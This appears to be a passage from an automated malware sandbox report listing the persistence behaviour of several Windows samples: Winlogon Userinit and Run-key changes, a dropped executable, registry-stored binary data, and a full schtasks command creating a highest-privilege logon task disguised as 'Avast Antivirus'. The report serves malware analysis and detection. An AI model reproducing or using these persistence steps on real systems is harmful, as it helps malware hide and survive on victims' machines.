Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre			Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File created: C:\Users\user\xdwdPutty.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio

Stores large binary data to the registry

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE D396F3C20883A3B71244C87C537595108010239E4E17E6C09BCA83EA5A475677

Jump to behavior

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
